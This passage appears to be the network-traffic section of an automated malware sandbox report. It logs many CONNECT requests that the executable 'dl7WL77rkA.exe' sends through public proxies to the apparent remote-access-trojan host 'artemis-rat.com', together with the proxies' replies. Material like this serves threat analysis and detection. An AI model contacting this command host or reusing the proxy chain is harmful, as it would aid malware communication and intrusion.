                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.692940950 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            110192.168.2.550004103.190.54.141803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.000951052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            111192.168.2.550122116.203.28.43803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.005151033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.322881937 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            112192.168.2.55010020.24.43.214803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.008583069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.344680071 CET319INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 17
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            X-Cache: MISS from cdn-fintech.info
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                                                                                                                                                                            Data Ascii: ERR_ACCESS_DENIED


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            113192.168.2.55009951.161.131.84492023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.008835077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            114192.168.2.55013094.23.83.53558063876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.023267984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.701680899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            115192.168.2.55000141.65.236.3719813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.028271914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.889205933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.217377901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.967825890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.311393976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.717600107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.108321905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            116192.168.2.550144155.185.15.5631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.034203053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.368597031 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            117192.168.2.550214142.44.194.14803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.037208080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.258440971 CET443INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.57 (Unix) OpenSSL/1.1.1k
                                                                                                                                                                                                                                                            Allow: HEAD,GET,POST,OPTIONS,TRACE
                                                                                                                                                                                                                                                            Content-Length: 224
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for this URL.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            118192.168.2.55011694.177.106.17823243876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.055336952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.424308062 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.22.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            119192.168.2.550238132.148.167.243280403876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.057851076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            120192.168.2.550236103.152.112.167803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.066387892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.240416050 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.23.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            121192.168.2.5500885.34.201.24431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.066994905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.227560997 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            122192.168.2.55023038.162.25.4431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.071161985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.485634089 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            123192.168.2.55021672.195.34.5841453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.075004101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            124192.168.2.550269104.22.14.48803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.082129002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.236845016 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            125192.168.2.5501668.210.58.56803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.101937056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.408253908 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.23.4
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.4</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            126192.168.2.55018654.223.158.8880803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.112514973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.435787916 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            127192.168.2.549786117.160.250.16380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.114576101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.085854053 CET221INHTTP/1.1 403 Access Denied
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-store
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            Content-Length: 43
                                                                                                                                                                                                                                                            Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                                                                                                                                                                                            Data Ascii: You are not allowed to access the document.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            128192.168.2.55025338.162.29.12531283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.129529953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.539990902 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            129192.168.2.550254162.120.71.11803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.130083084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
